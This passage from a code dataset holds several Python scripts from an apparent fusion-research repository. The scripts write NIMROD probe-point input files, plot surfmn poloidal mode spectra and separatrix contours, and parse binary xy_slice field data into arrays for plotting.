'/SCRATCH/'\nwrkDir = 'KSTAR/19118_2950_C1wall/22062201_probeg/'\n\nnimBdry = 'nimrod_bdry_rz.txt'\nrzFile = 'probe.points.rz.in'\n\nphiPlanes = 256\n\n\n\n############## Start of code ###################\nfullNimBdry = scratchDir+wrkDir+nimBdry\nfullRzFile = scratchDir+wrkDir+rzFile\nnodeRZ = np.loadtxt(fullNimBdry,delimiter=',',skiprows=1)\nprint(nodeRZ.shape)\n\nrzpts = nodeRZ.shape[0]\nprobeFile = open(fullRzFile,'w')\nprobeFile.write(\"&startptsrz\\n\")\nprobeFile.write(\"\\n\")\nprobeFile.write(\" nptsrz = \" + str(rzpts) + \"\\n\")\nprobeFile.write(\" phinrz = 0 \\n\")\nprobeFile.write(\" nphinrz = \" + str(phiPlanes)+ \"\\n\")\nprobeFile.write(\"\\n\")\nprobeFile.write(\" ptsrz(1:2, 1:\" + str(rzpts) + \") = \\n\")\nfor ii in range(rzpts):\n thisStr = \" \" + str(nodeRZ[ii,0]) + \" \" + str(nodeRZ[ii,1]) \n probeFile.write(thisStr + \"\\n\")\nprobeFile.write(\"\\n\")\nprobeFile.write(\"&END\")\nprobeFile.close()\n" }, { "alpha_fraction": 0.6027638912200928, "alphanum_fraction": 0.658629834651947, "avg_line_length": 27.82203483581543, "blob_id": "7f583f72f17cb47d78b105860db74100d14b30f8", "content_id": "09cac78089818e77be75645616412b2beeccc635", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3401, "license_type": "no_license", "max_line_length": 90, "num_lines": 118, "path": "/surfmn/test_surfmn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport fsa_surfmn as surfmn\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\ncase =2\nif case==0:\n dumpfile = \"dumpgll.10000.h5\"\n nimrodin = \"nimrod.in\"\n time=0.541\nelif case ==1:\n dumpfile = \"dumpgll.28000.h5\"\n nimrodin = \"nimrod.in\"\n time=1.784\nelif case ==2:\n dumpfile = \"dumpgll.66000.h5\"\n nimrodin = \"nimrod.in\"\n time=5.000\nelse:\n print(f\"Case {case} not recognized\")\n raise\n\nsurf=surfmn.fsasurfmn(dumpfile,nimrodin)\nrzo=np.array([1.768,-0.018831,0.0])\nfargs={}\neqflag=1\nmmax=15\nn_max=5\nfargs['ifour']=list(range(1,n_max+1))\nfargs['mmax']=mmax\nsurf.calculate(rzo=rzo,nsurf=150,eqflag=eqflag,fargs=fargs)\n\n\nq1list=[-4,-3,-2]\nm1list=list(range(-4,0))\nq2list=[-4,-3,-2.5,-2,-1.5]\nm2list=list(range(-8,0))\nq3list=[-3,-2.33, -2,-1.67,-1.33]\nm3list=list(range(-12,-3))\nq4list=[-3,-2,-1.75,-1.5,-1.25]\nm4list=list(range(-15,-6))\nq5list=[-3,-2,-1.8,-1.6,-1.4,-1.2]\nm5list=list(range(-15,-6))\n\nqlists=[q1list,q2list,q3list,q4list,q5list]\nmlists=[m1list,m2list,m3list,m4list,m5list]\n\n#fig=plt.figure(figsize=(8,8))\n#ax=fig.add_subplot(111)\n#plt.plot(surf.rhon,-1.0*surf.q)\n#plt.title(r\"Safety factor\",fontsize=16)\n#plt.ylabel(r'|q|',fontsize=16)\n#plt.xlabel(r'$\\rho_N$',fontsize=16)\n#plt.tight_layout()\n#plt.show()\n\nfor ii,imode in enumerate(fargs['ifour']):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n title=f\"$\\psi$(n={int(imode)}) at {time:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=18\n for im,this_m in enumerate(mlists[ii]):\n this_i = surf.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im%len(colorlist)]\n ax.plot(surf.rhon,surf.bmn[ii,this_i,:]*1000, color=tc, label=mlbl)\n for iq,qq in enumerate(qlists[ii]):\n try:\n irho = surf.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,frameon=True,fontsize=fontsize)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n if True:\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Determine which field to plot and set titles and labels\n #fmn=np.copy(surf.psimnlist[ndex])\n title=f\"$\\psi$(n={int(imode)}) at {time:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(surf.bmn[ii,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(surf.q)\n qmax=np.amax(surf.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-mmax,mmax+1)\n mv, rv = np.meshgrid(m, surf.rhon, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(surf.bmn[ii,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,surf.get_rho_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-mmax,mmax)\n plt.show()\n" }, { "alpha_fraction": 0.614449679851532, "alphanum_fraction": 0.6360567212104797, "avg_line_length": 26.44444465637207, "blob_id": "bcde36ef7df9a17af337fab0b208b4e4946c4331", "content_id": "975c33d9d126dbbffbfed02ff8f60d870c5024a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1481, "license_type": "no_license", "max_line_length": 70, "num_lines": 54, "path": "/plotingScripts/plotGrn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script reads a .grn file and plots the seperatrix and wall'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nimport os\nimport sys as sys\n\nhomeDir = os.environ['HOME']\nrelDir = \"/SCRATCH/166439/03300_vac_eq/complexconj_rmp/\"\nfileName = \"sol.grn\"\n\n\n\n\n# Begin actual code\nfullFilePath = homeDir + relDir + fileName\nxyCon = [] # list of contours\nit = 0\nwith open(fullFilePath, 'r') as grnFile:\n while(True):\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n if(len(thisWords)==0): break\n if (thisWords[0] != 'x'+str(it)):\n sys.exit(\"Expecting x\" +str(it) + \" read \" + thisWords[0])\n nSep = int(thisWords[1])\n thisCon = np.zeros([nSep,2])\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n for ix, xx in enumerate(thisWords):\n thisCon[ix,0]= float(xx)\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n if (thisWords[0] != 'y'+str(it)):\n sys.exit(\"Expecting y\" +str(it) + \" read \" + thisWords[0])\n if (int(thisWords[1])!=nSep): sys.exit(\"nSep x != nSep y\")\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n for iy, yy in enumerate(thisWords):\n thisCon[iy,1]= float(yy)\n xyCon.append(thisCon)\n it+=1\n if (it>5):\n break\n\nfor ii, iCon in enumerate(xyCon):\n plt.scatter(iCon[:,0],iCon[:,1],s=1, label = \"Contour :\" + str(ii))\n plt.legend()\nplt.show()\n\nplt.scatter(xyCon[1][:,0],xyCon[1][:,1])\nplt.show()" }, { "alpha_fraction": 0.5297410488128662, "alphanum_fraction": 0.5792713165283203, "avg_line_length": 35.9347038269043, "blob_id": "394a36b90a90302e60b5f962d0eb3f0c6c5fcee7", "content_id": "fe6a6de889a01f861ffef23189d6f49ba8d32b00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30547, "license_type": "no_license", "max_line_length": 292, "num_lines": 827, "path": "/surfmnNim/fieldIndex.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport struct\nimport numpy as np\n#from mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib import ticker\nfrom fgProfs import rho,qg,irho2,irho3,irho4\n\n\n# xy have elecd=0.25\n# file size = 4* (49*(mx*pd+1)+2)*(my*pd+1)\n\n#plt.rcParams['text.usetex']=True\n\nint_size = 4\nfloat_size = 4\nnimmx=144\nnimmy=128\nnimpd=5\n\nplotfields=0\n# list of file names to be read\nfiles=['/home/research/ehowell/SCRATCH/166439/footpoint_03300_q104/lphi5/S7Pr1e2_surfmn/xy_slice01.bin']\nfiles=['/home/research/ehowell/SCRATCH/166439/footpoint_03300_q104/lphi5/vac_surfmn/xy_slice01.bin']\nfiles=['/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/n1_run1/orginal_exb/300000/xy_slice.bin']\n#,'xy_slice17.bin','xy_slice260.bin']\n#files=['xy_slice15000.bin']\n# slicesy is between 0 and my*pd for all yslices\nslicesy=[0]\ncolor=cm.rainbow(np.linspace(0,1,len(slicesy)))\n#I assume all files have the same size\nmx={files[0]:nimmx}#,files[1]:128,files[2]:128}\nmy={files[0]:nimmy}#,files[1]:72,files[2]:72}\npd={files[0]:nimpd}#,files[1]:5,files[2]:5}\nnpx={}\nnpy={}\n\ntf={}\nix={}\niy={}\nR={}\nZ={}\nB0R={}\nB0Z={}\nB0T={}\nJ0R={}\nJ0Z={}\nJ0T={}\nV0R={}\nV0Z={}\nV0T={}\nP0={}\nPE0={}\nn0={}\ndiff={}\nBRr={}\nBZr={}\nBTr={}\nBRi={}\nBZi={}\nBTi={}\nJRr={}\nJZr={}\nJTr={}\nJRi={}\nJZi={}\nJTi={}\nVRr={}\nVZr={}\nVTr={}\nVRi={}\nVZi={}\nVTi={}\nPr={}\nPi={}\nPEr={}\nPEi={}\nNr={}\nNi={}\nCr={}\nCi={}\nTEr={}\nTEi={}\nTIr={}\nTIi={}\nN={}\n\n#each field will be a 2x2 array of size(mx*pd+1,my*pd+1)\nfor findex in range(len(files)):\n npx[files[findex]]=mx[files[findex]]*pd[files[findex]]+1\n npy[files[findex]]=my[files[findex]]*pd[files[findex]]+1\n\n tf[files[findex]]=np.zeros(47,dtype='f',order = 'F')\n ix[files[findex]]=np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n iy[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n R[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Z[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n B0R[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n B0Z[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n B0T[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n J0R[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n J0Z[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n J0T[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n V0R[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n V0Z[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n V0T[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n P0[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n PE0[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n n0[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n diff[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BRr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BZr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BTr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BRi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BZi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BTi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JRr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JZr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JTr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JRi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JZi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JTi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VRr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VZr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VTr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VRi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VZi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VTi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Pr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Pi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n PEr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n PEi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Nr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Ni[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Cr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Ci[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n TEr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n TEi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n TIr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n TIi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n N[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n\n\n\n\n f=open(files[findex], 'rb')\n limity=my[files[findex]]*pd[files[findex]]+1\n limitx=mx[files[findex]]*pd[files[findex]]+1\n\n jj=0\n f.seek(0)\n\n while jj < limity :\n ii=0\n while ii < limitx :\n #first bite is length of a string\n temp=f.read(4)\n blah=struct.unpack(\">l\",temp)\n# if jj==0 and (ii==0 or ii==1):\n# print blah\n temp=f.read(188)\n tf[files[findex]] = struct.unpack(\">\"+47*'f', temp)\n if jj==0 and (ii==0 or ii==1):\n tf1=tf\n# print tf1,'\\n'\n #last byte is length of string read\n temp=f.read(4)\n blah=struct.unpack(\">l\",temp)\n# if jj==0 and (ii==0 or ii==1):\n# print blah\n\n ix[files[findex]][ii,jj]=tf[files[findex]][0]\n iy[files[findex]][ii,jj]=tf[files[findex]][1]\n R[files[findex]][ii,jj]=tf[files[findex]][2]\n Z[files[findex]][ii,jj]=tf[files[findex]][3]\n B0R[files[findex]][ii,jj]=tf[files[findex]][4]\n B0Z[files[findex]][ii,jj]=tf[files[findex]][5]\n B0T[files[findex]][ii,jj]=tf[files[findex]][6]\n J0R[files[findex]][ii,jj]=tf[files[findex]][7]\n J0Z[files[findex]][ii,jj]=tf[files[findex]][8]\n J0T[files[findex]][ii,jj]=tf[files[findex]][9]\n V0R[files[findex]][ii,jj]=tf[files[findex]][10]\n V0Z[files[findex]][ii,jj]=tf[files[findex]][11]\n V0T[files[findex]][ii,jj]=tf[files[findex]][12]\n P0[files[findex]][ii,jj]=tf[files[findex]][13]\n PE0[files[findex]][ii,jj]=tf[files[findex]][14]\n n0[files[findex]][ii,jj]=tf[files[findex]][15]\n diff[files[findex]][ii,jj]=tf[files[findex]][16]\n BRr[files[findex]][ii,jj]=tf[files[findex]][17]\n BZr[files[findex]][ii,jj]=tf[files[findex]][18]\n BTr[files[findex]][ii,jj]=tf[files[findex]][19]\n BRi[files[findex]][ii,jj]=tf[files[findex]][20]\n BZi[files[findex]][ii,jj]=tf[files[findex]][21]\n BTi[files[findex]][ii,jj]=tf[files[findex]][22]\n JRr[files[findex]][ii,jj]=tf[files[findex]][23]\n JZr[files[findex]][ii,jj]=tf[files[findex]][24]\n JTr[files[findex]][ii,jj]=tf[files[findex]][25]\n JRi[files[findex]][ii,jj]=tf[files[findex]][26]\n JZi[files[findex]][ii,jj]=tf[files[findex]][27]\n JTi[files[findex]][ii,jj]=tf[files[findex]][28]\n VRr[files[findex]][ii,jj]=tf[files[findex]][29]\n VZr[files[findex]][ii,jj]=tf[files[findex]][30]\n VTr[files[findex]][ii,jj]=tf[files[findex]][31]\n VRi[files[findex]][ii,jj]=tf[files[findex]][32]\n VZi[files[findex]][ii,jj]=tf[files[findex]][33]\n VTi[files[findex]][ii,jj]=tf[files[findex]][34]\n Pr[files[findex]][ii,jj]=tf[files[findex]][35]\n Pi[files[findex]][ii,jj]=tf[files[findex]][36]\n PEr[files[findex]][ii,jj]=tf[files[findex]][37]\n PEi[files[findex]][ii,jj]=tf[files[findex]][38]\n Nr[files[findex]][ii,jj]=tf[files[findex]][39]\n Ni[files[findex]][ii,jj]=tf[files[findex]][40]\n Cr[files[findex]][ii,jj]=tf[files[findex]][41]\n Ci[files[findex]][ii,jj]=tf[files[findex]][42]\n TEr[files[findex]][ii,jj]=tf[files[findex]][43]\n TEi[files[findex]][ii,jj]=tf[files[findex]][44]\n TIr[files[findex]][ii,jj]=tf[files[findex]][45]\n TIi[files[findex]][ii,jj]=tf[files[findex]][46]\n ii=ii+1\n if (jj<(limity-1)):\n temp= f.read(8)\n jj=jj+1\n\n f.close()\n\n\n\nfor m in range(len(files)):\n for i in range(len(BRr[files[m]][:,0])-1):\n for j in slicesy:\n N[files[m]][i,j]=-(R[files[m]][i,j]/BZr[files[m]][i,j])*(BZr[files[m]][i+1,j]-BZr[files[m]][i,j])/(R[files[m]][i+1,j]-R[files[m]][i,j])\n if BZr[files[m]][i,j]==0:\n# print \"BZr=0\",BZr[files[m]][i,j]\n N[files[m]][i,j]=0\n if (R[files[m]][i+1,j]-R[files[m]][i,j])==0:\n# print \"R=0\",R[files[m]][i+1,j],R[files[m]][i,j]\n N[files[m]][i,j]=0\n N[files[m]][-1,j]=-(R[files[m]][-1,j]/BZr[files[m]][-1,j])*(BZr[files[m]][-1,j]-BZr[files[m]][-2,j])/(R[files[m]][-1,j]-R[files[m]][-2,j])\n\n\nqcon1=np.zeros((npx[files[findex]],npy[files[findex]]))\n#fgfile='fgprofs.bin'\nfgfile='/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/orginal_exb/fgprofs.bin'\n\n\nfor j in range(npy[files[0]]):\n for i in range(qg[fgfile].size): \n print(j,i)\n qcon1[i+1,j]=qg[fgfile][i]\n qcon1[i+2,j]=-5.\n \n\nclines=301\n\npr_max = np.max(J0T[files[0]])\npr_min = np.min(J0T[files[0]])\n\nif abs(pr_max)>abs(pr_min):\n pr_min=-pr_max\nelse:\n pr_max=-pr_min\n\nlev,delta=np.linspace(pr_min,pr_max,clines,retstep=True)\n\nqlev=np.array([-4,-3,-2]) \n\nif plotfields==1:\n fig,ax=plt.subplots(1,2,figsize=(10,6),sharey=True) \n CS=ax[0].contourf(R[files[0]],Z[files[0]],J0T[files[0]],levels=lev,cmap=cm.seismic)\n\n QS=ax[0].contour(R[files[0]],Z[files[0]],qcon1,levels=qlev,colors='k',linestyles='solid')\n\n fmt = {}\n strs=[r'$q=\\!-4$',r'$q=\\!-3$',r'$q=\\!-2$']\n for l, s in zip(QS.levels, strs):\n fmt[l] = s\n\n manual_locations=[(1.36,0.85),(1.42,0.73),(1.48,0.59)]\n\n ax[0].clabel(QS,qlev,inline=1,fmt=fmt,manual=manual_locations,inline_spacing=15)\n\n ax[0].set_aspect('equal')\n\n plt.setp(ax[0].get_xticklabels(), fontsize=18)\n plt.setp(ax[0].get_yticklabels(), fontsize=18)\n ax[0].set_title(r'Real $(J_{\\phi})$',fontsize=22)\n ax[0].set_xlabel(r'${\\rm R\\,(m)}$',fontsize=20)\n ax[0].set_ylabel(r'${\\rm Z\\,(m)}$',fontsize=20)\n cbar=plt.colorbar(CS,pad=0.01)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=18)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(16)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n\n CS=ax[1].contourf(R[files[0]],Z[files[0]],J0T[files[0]],levels=lev,cmap=cm.seismic)\n\n QS=ax[1].contour(R[files[0]],Z[files[0]],qcon1,levels=qlev,colors='k',linestyles='solid')\n\n ax[1].clabel(QS,qlev,inline=1,fmt=fmt,manual=manual_locations,inline_spacing=15)\n\n ax[1].set_aspect('equal')\n\n plt.setp(ax[1].get_xticklabels(), fontsize=18)\n plt.setp(ax[1].get_yticklabels(), fontsize=18)\n ax[1].set_title(r'Real $(J_{\\phi})$',fontsize=22)\n ax[1].set_xlabel(r'${\\rm R\\,(m)}$',fontsize=20)\n\n plt.savefig('xy_J0T.png',bbox_inches='tight') \n\n fig,ax=plt.subplots(2,1,figsize=(5,10),sharex=True) \n\n plt.setp(ax[0].get_xticklabels(), fontsize=16)\n plt.setp(ax[0].get_yticklabels(), fontsize=16)\n\n jj=0\n for j in slicesy:\n ax[0].plot(R[files[0]][:,j],-J0T[files[0]][:,j],c='red',lw=3,label=r'With SOL')\n ax[0].plot(R[files[0]][:,j],-J0T[files[0]][:,j],c='blue',lw=3,label=r'Without SOL')\n \n jj=jj+1\n\n ax[0].set_xlim(2.23,2.25)\n ax[0].set_ylim(-10000,80000)\n\n ax[0].yaxis.major.formatter._useMathText = True\n ax[0].ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax[0].yaxis.offsetText.set_fontsize(16)\n\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax[0].set_ylabel(r'$J_{0,\\phi}\\,({\\rm A/m^2})$',fontsize=18)\n #ax[0].set_xlabel(r'$R\\,({\\rm m})$',fontsize=18)\n\n plt.legend(loc=1,fontsize=14)\n\n plt.setp(ax[1].get_xticklabels(), fontsize=16)\n plt.setp(ax[1].get_yticklabels(), fontsize=16)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax[1].plot(R[files[0]][:,j],P0[files[0]][:,j],c='red',lw=3,label=r'With SOL')\n ax[1].plot(R[files[0]][:,j],P0[files[0]][:,j],c='blue',lw=3,label=r'Without SOL')\n \n jj=jj+1\n\n ax[1].set_xlim(2.23,2.25)\n ax[1].set_ylim(0,750)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax[1].set_ylabel(r'$P_0\\,({\\rm Pa})$',fontsize=18)\n ax[1].set_xlabel(r'$R\\,({\\rm m})$',fontsize=18)\n\n plt.legend(loc=1,fontsize=14)\n\n plt.savefig('xy_P0compare.png',bbox_inches='tight') \n\n fig=plt.figure(figsize=(12,12))\n\n ax=fig.add_subplot(431)\n plt.title(r'$B_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BRr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(432)\n plt.title(r'$B_Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BZr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(433)\n plt.title(r'$B_\\phi$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BTr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(434)\n plt.title(r'$B_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BRi[files[0]][:,j],label=r'$B_R$')\n\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(435)\n plt.title(r'$B_Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BZi[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(436)\n plt.title(r'$B_\\phi$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BTi[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n plt.tight_layout()\n filename=files[0].split('.')\n plt.savefig(filename[0]+\"_B1_findex.png\",bbox_inches='tight') \n \n fig=plt.figure(figsize=(12,12))\n\n ax=fig.add_subplot(431)\n plt.title(r'$B0R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],B0R[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n 